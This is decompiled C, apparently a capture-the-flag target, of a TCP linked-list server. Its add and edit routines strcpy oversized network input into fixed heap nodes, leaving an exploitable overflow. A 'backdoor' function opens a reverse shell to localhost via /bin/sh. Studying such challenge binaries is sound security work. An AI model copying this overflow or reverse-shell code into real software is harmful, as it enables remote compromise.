//Function: add ->0x4199478 7 perm->5 void __cdecl add(char *str) { Node *newNode; // [rsp+18h] [rbp-8h] newNode = (Node *)malloc(0x108uLL); strcpy(newNode->data, str); newNode->next = head; head = newNode; } //Function: delete ->0x4199559 7 perm->5 void __cdecl delete(char *str) { Node *entry; // [rsp+10h] [rbp-10h] Node **current; // [rsp+18h] [rbp-8h] for ( current = &head; *current; current = &entry->next ) { entry = *current; if ( !strcmp((*current)->data, str) ) { *current = entry->next; free(entry); return; } } } //Function: edit ->0x4199684 7 perm->5 void __cdecl edit(char *oldStr, char *newStr) { Node *current; // [rsp+18h] [rbp-8h] for ( current = head; current; current = current->next ) { if ( !strcmp(current->data, oldStr) ) { strcpy(current->data, newStr); return; } } } //Function: show ->0x4199787 7 perm->5 void __cdecl show(int client_sock) { size_t v1; // rax char buffer[1024]; // [rsp+10h] [rbp-410h] BYREF Node *current; // [rsp+418h] [rbp-8h] for ( current = head; current; current = current->next ) { snprintf(buffer, 0x400uLL, "%s\n", current->data); v1 = strlen(buffer); send(client_sock, buffer, v1, 0); } } //Function: main ->0x4199929 7 perm->5 // local variable allocation has failed, the output may be wrong! // bad sp value at call has been detected, the output may be wrong! int __fastcall __noreturn main(int argc, const char **argv, const char **envp) { int opt; // [rsp+Ch] [rbp-C44h] BYREF char arg2[1024]; // [rsp+10h] [rbp-C40h] BYREF char arg1[1035]; // [rsp+410h] [rbp-840h] BYREF char command[5]; // [rsp+81Bh] [rbp-435h] BYREF _BYTE buffer[1032]; // [rsp+820h] [rbp-430h] OVERLAPPED BYREF int addrlen; // [rsp+C2Ch] [rbp-24h] BYREF sockaddr_in address; // [rsp+C30h] [rbp-20h] BYREF int new_socket; // [rsp+C48h] [rbp-8h] int server_fd; // [rsp+C4Ch] [rbp-4h] addrlen = 16; *(_QWORD *)buffer = 0LL; *(_QWORD *)&buffer[8] = 0LL; memset(&buffer[24], 0, 0x3F0uLL); opt = 1; server_fd = socket(2, 1, 0); if ( !server_fd ) { perror("socket failed"); exit(1); } if ( setsockopt(server_fd, 1, 15, &opt, 4u) ) { perror("setsockopt"); exit(1); } address.sin_family = 2; address.sin_addr.s_addr = 0; address.sin_port = htons(0x2B04u); if ( bind(server_fd, (const struct sockaddr *)&address, 0x10u) < 0 ) { perror("bind failed"); exit(1); } if ( listen(server_fd, 3) < 0 ) { perror("listen"); exit(1); } printf("Server listening on port %d\n", 11012); while ( 1 ) { new_socket = accept(server_fd, (struct sockaddr *)&address, (socklen_t *)&addrlen); if ( new_socket < 0 ) break; read(new_socket, buffer, 0x400uLL); memset(command, 0, sizeof(command)); memset(arg1, 0, 0x400uLL); memset(arg2, 0, sizeof(arg2)); ((void (*)(_BYTE *, const char *, ...))__isoc99_sscanf)(buffer, "%4s %1023s %1023s", command, arg1, arg2); if ( !strcmp(command, "ADD") ) { add(arg1); } else if ( !strcmp(command, "DEL") ) { delete(arg1); } else if ( !strcmp(command, "EDIT") ) { edit(arg1, arg2); } else if ( !strcmp(command, "SHOW") ) { show(new_socket); } else { puts("Unknown command."); } close(new_socket); } perror("accept"); exit(1); } //Function: backdoor ->0x4200706 7 perm->5 // bad sp value at call has been detected, the output may be wrong! int __cdecl backdoor() { char *new_envp[2]; // [rsp+0h] [rbp-40h] BYREF char *new_argv[2]; // [rsp+10h] [rbp-30h] BYREF sockaddr_in serv_addr; // [rsp+20h] [rbp-20h] BYREF int sock; // [rsp+3Ch] [rbp-4h] new_argv[0] = "/bin/sh"; new_argv[1] = 0LL; new_envp[0] = "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"; new_envp[1] = 0LL; sock = socket(2, 1, 0); if ( sock >= 0 ) { serv_addr.sin_family = 2; serv_addr.sin_port = htons(0x2EECu); if ( inet_pton(2, "127.0.0.1", &serv_addr.sin_addr) > 0 ) { if ( connect(sock, (const struct sockaddr *)&serv_addr, 0x10u) >= 0 ) { dup2(sock, 0); dup2(sock, 1); dup2(sock, 2); execve(new_argv[0], new_argv, new_envp); return 0; } else { puts("\nConnection Failed "); return -1; } } else { puts("\nInvalid address/ Address not supported "); return -1; } } else { puts("\n Socket creation error "); return -1; } }